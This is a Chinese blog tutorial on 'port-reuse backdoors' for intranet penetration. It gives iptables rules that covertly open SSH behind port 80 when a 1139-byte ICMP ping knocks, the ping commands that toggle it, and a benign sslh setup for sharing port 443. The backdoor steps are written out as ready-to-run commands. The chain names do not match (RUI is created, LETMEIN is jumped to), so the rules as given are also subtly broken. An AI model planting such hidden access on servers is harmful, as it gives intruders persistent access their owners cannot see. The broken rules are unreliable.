iptables端口复用后门+sslh

已于 2023-02-08 05:36:25 修改
阅读量237 收藏
点赞数
文章标签: 服务器 linux 网络
于 2023-02-05 22:10:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RuiIDS/article/details/128894303
版权

1、端口复用的概念
端口复用是不同的应用程序使用相同的端口进行通讯,在内网渗透中,服务器仅允许指定的端口开放,利用端口复用可以把例如3389端口转发到80端口上进行外部连接

目的:服务器一般部署在内网,仅有web服务用于被访问,我们将其他的服务通过端口复用绑定在80端口上,相当于给自己留下了一个后门

2、iptables端口复用
步骤:

1、创建端口复用链
iptables -t nat -N RUI

2、添加端口复用规则到内部,将流量转发到22端口
iptables -t nat -A RUI -p tcp -j REDIRECT --to-port 22

在这里插入图片描述

3、创建开启开关,如果接收到长1139的ICMP包,则将来源ip添加到letmein的列表中
iptables -t nat -A PREROUTING -p icmp --icmp-type 8 -m length --length 1139 -m recent --set --name letmein --rsource -j ACCEPT

4、创建关闭开关,如果接收到一个长为 1140 的 ICMP 包,则将来源 IP 从 letmein 列表中去掉
iptables -t nat -A PREROUTING -p icmp --icmp-type 8 -m length --length 1140 -m recent --name letmein --remove -j ACCEPT

在这里插入图片描述

5、如果发现 SYN 包的来源 IP 处于 letmein 列表中,将跳转到 LETMEIN 链进行处理,有效时间为 3600 秒
iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN

在这里插入图片描述

6、测试

&1(开启复用):向目标发送一个长为1111的ICMP包,实际长度为1139
ping -c 1 -s 1111 192.168.20.129

&2(关闭复用):向目标发送一个长度为1112的ICMP数据包,实际长度为1140
ping -c 1 -s 1112 192.168.20.129

ICMP包:

因为IP报头最小长度20字节,ICMP报头最小长度8字节,所以这里实际长度算法为1111+28=1139
1112+28=1140

在这里插入图片描述

3、基于sslh端口复用
装载sslh(Ubuntu)
apt-get install sslh

配置Apache或者Nginx服务器
#首先找到
listen 443 ssl;
#然后修改为
listen 127.0.0.1:443 ssl;
然后保存退出

配置sslh
vim /etc/default/sslh

找到
Run=no
#然后改成yes
Run=yes

允许 sslh在所有可用接口上侦听端口 443
DAEMON_OPTS=“–user sslh --listen 0.0.0.0:443 --ssh 127.0.0.1:22 --ssl 127.0.0.1:443 --pidfile /var/run/sslh/sslh.pid”

然后就可以重启服务了
service sslh restart

重启服务后
测试—检查 SSLH 守护程序是否正在监听 443即可
ps -ef | grep sslh

RuiIDS
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sslh:应用协议多路复用器(例如,在同一端口上共享SSH和HTTPS)
02-20
sslh-ssl / ssh多路复用sslh接受指定端口上的连接,并根据对远程客户端发送的第一个数据包执行的测试进一步转发它们。 实现了针对HTTP,TLS / SSL(包括SNI和ALPN),SSH,OpenVPN,tinc,XMPP,SOCKS5的探针,并且可以识别可以使用正则表达式测试的任何其他协议。 一个典型的用例是允许在端口443上提供多种服务(例如,从公司防火墙内部连接到SSH,几乎从不阻止端口443),同时仍在该端口上提供HTTPS。 因此, sslh充当协议多路分解器或配电盘。 使用SNI和ALPN探针,它可以很好地成为托管在单个IP地址后面的虚拟主机场的前端。 sslh具有成熟的守护程序所sslh :特权和功能下降,inetd支持,systemd支持,透明代理,chroot,日志记录,IPv4和IPv6,基于fork和基于select的模型等等。 安装 请参考。
iptables简要知识
Jweilai
12-01 780
iptables作为Linux系统的防火墙服务,我们几乎不可避免的会用到这项服务。而iptables有非常多的规则,这里我们就简单介绍一些常用的iptables技巧 #禁止所有外部IP访问本机的8443端口(基于TCP协议) iptables -I INPUT -p tcp --dport 8443 -j DROP #允许192.168.157.12访问本机的8443端口 iptables -I ...
sslh 端口复用
weixin_49254673的博客
02-20 393
配置文件为/etc/sslh.cfg;启动服务systemctl start sslh。访问11443端口相当于访问本地https 443端口和web服务的80端口。比如我想一个端口同时可以作为ssh登录又可以通过web访问,如上图所示。访问11443端口相当于访问本地ssh 22端口和web服务的80端口。listen为服务监听地址和端口;protocols为匹配规则。可以通过epel源直接下载。
iptables进行端口复用SSLH工具使用
qq_51204045的博客
02-03 749
安装 SSLH 时,将提示你是要将 sslh 作为从 inetd 运行的服务,还是作为独立服务器运行。另一方面,如果有很多连接,sslh 应作为独立服务器运行,以避免为每个传入连接生成新进程。let’s do it,如果发现 SYN 包的来源 IP 处于 letmein 列表中,将跳转到 LETMEIN 链进行处理,有效时间为 3600 秒。开启开关,如果接收到一个长为 1139 的 ICMP 包,则将来源 IP 添加到加为letmein的列表中。定义:端口复用是指不同的应用程序使用相同端口进行通讯。
iptables端口复用+sslh隐藏端口
asl404的博客
02-06 431
iptables
iptables 端口转发
07-02
iptables是一个Linux下优秀的nat+防火墙工具
Linuxiptables 禁止端口和开放端口示例
09-15
本篇文章主要介绍了Linuxiptables 禁止端口和开放端口示例,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
通过iptables实现端口转发和内网共享上网.docx
09-30
通过iptables实现端口转发和内网共享上网 本文将详细介绍如何使用iptables实现端口转发和内网共享上网。iptables是一个Linux下的优秀的nat+防火墙工具,可以配置灵活强劲的防火墙+nat系统。 首先,需要说明的是,...
利用iptables来配置linux禁止所有端口登陆和开放指定端口的方法
09-15
下面小编就为大家带来一篇利用iptables来配置linux禁止所有端口登陆和开放指定端口的方法。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
Linux+iptables+防火墙+添加删除+端口.doc
03-01
Linux+iptables+防火墙+添加删除+端口.doc
【安全】端口复用:远程遥控iptables&SSLH工具
故余虽愚,卒获有所闻
02-03 933
iptables开启后,,分别为Prerouting(路由前)、Input(输入)、Outpu(输出)、Forward(转发)、Postrouting(路由后):每一道关卡中有多个规则,数据报文,这些规则串起来就像一条链,所以我们把这些关卡都叫【一般写规则的序号都是跳着用,5‘10’15这些,因为匹配按顺序所以对规则进行了留白】当接收到防火墙本机地址的数据包(入站)时,应用此链中的规则;当防火墙本机向外发送数据包(出站)时,应用此链中的规则;
利用iptable实现ssh端口复用后门
qq_68163788的博客
11-20 1466
Linux系统中,可以使用iptables来实现SSH端口复用后门。SSH端口复用后门是一种隐藏在SSH服务中的后门,可以通过修改iptables规则来实现。 首先,需要确保iptables已经安装在系统中。上面的命令中,是指定的用于后门端口号,是原本的SSH服务端口号。 接下来,需要修改SSH配置文件,将监听端口改为新的端口号。打开SSH配置文件(通常是/etc/ssh/sshd_config),找到Port项,并将原本的SSH端口号改为新的端口号。
IPTables进行端口复用+sslh
XZZXFC的博客
02-03 166
IPTables端口复用+sslh
centos ssh localhost refused_SSLH:让 HTTPS 和 SSH 共享同一个端口 | Linux 中国
weixin_39967598的博客
11-12 138
如果你遇到大多数端口被防火墙阻止的情况,你可以使用 SSLH 访问远程服务器。这个简短的教程描述了如何在类 Unix 操作系统中使用 SSLH 让 https、ssh 共享相同的端口。-- Sk一些 ISP 和公司可能已经阻止了大多数端口,并且只允许少数特定端口(如端口 80 和 443)访问来加强其安全性。在这种情况下,我们别无选择,但同一个端口可以用于多个程序,比如 HTTPS 端口...
端口复用
我喜欢雨天的清新的博客
11-27 628
端口复用 Linux 3.9以上   使用 so_reuseport 选项即可 Linux 3.9以下 非listen态的端口复用   so_addrreuse 解决 listen态的socket   多个进程accept 同一个listen_socket实现端口复用 惊群   Linux 2.6以下是有惊群效应,当一个连接到来时,内核会唤醒该listen_socket上调用accept函数的所有...
如何在Web服务器80端口上开启SSH服务
weixin_30514745的博客
10-29 430
本文所讨论的网络端口复用并非指网络编程中采用SO_REUSEADDR选项的 Socket Bind 复用。它更像是一个带特定路由功能的端口转发工具,在应用层实现。 背景 笔者所处网络中防火墙只开放了一个端口,但却希望能够提供多种网络服务用于测试。所以需要寻求一种解决方案,能够对TCP数据包特征进行识别,用以实现在一个开放端口上同时提供HTTP/SSH/MQTT等多种服务。 比如说,你可以在80端口...
linux下几种端口安全技术 ssh端口 ssh后门 sslh
yuezhilangniao的博客
05-08 399
# linux下几种端口安全技术 更多请阅读原文:https://blog.csdn.net/weixin_31632529/article/details/112469136?utm_source=app&app_version=4.7.0 # 两种端口复用方式 # 第一种 sslh方式 添加EPEL源 CentOS 6 # yum install https://dl.fedoraproject.org/pub/epel/epel-release-latest-...
新玩具sslh
hell_world!
09-11 347
sslh的作用就是通过ssl端口进行ssh的"勾当"。不错。 ref:SSLH:让 HTTPS 和 SSH 共享同一个端口
SSLH:让 HTTPS 和 SSH 共享同一个端口
qq_40907977的博客
05-19 1189
转载来源 :SSLH:让 HTTPS 和 SSH 共享同一个端口:http://www.safebase.cn/article-258224-1.html 摘要: 如果你遇到大多数端口被防火墙阻止的情况,你可以使用 SSLH 访问远程服务器。这个简短的教程描述了如何在类 Unix 操作系统中使用 SSLH 让 https、ssh 共享相同的端口。-- Sk(作者)一些 ISP 和公司可能已经阻止了大多数端口,并且只允许少数特定端口(如端口 80 和 443)访问来加强其安全性。在这种情 … 如果你遇到大
iptables-save++-t
最新发布
02-24
iptables-save是一个Linux命令,用于将当前系统上的iptables规则保存到文件中。它可以将iptables规则以文本的形式输出到标准输出或指定的文件中。 而"++-t"这个参数在iptables-save命令中是无效的,可能是一个错误的参数。 如果你有其他关于iptables的问题,我可以帮助你解答。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值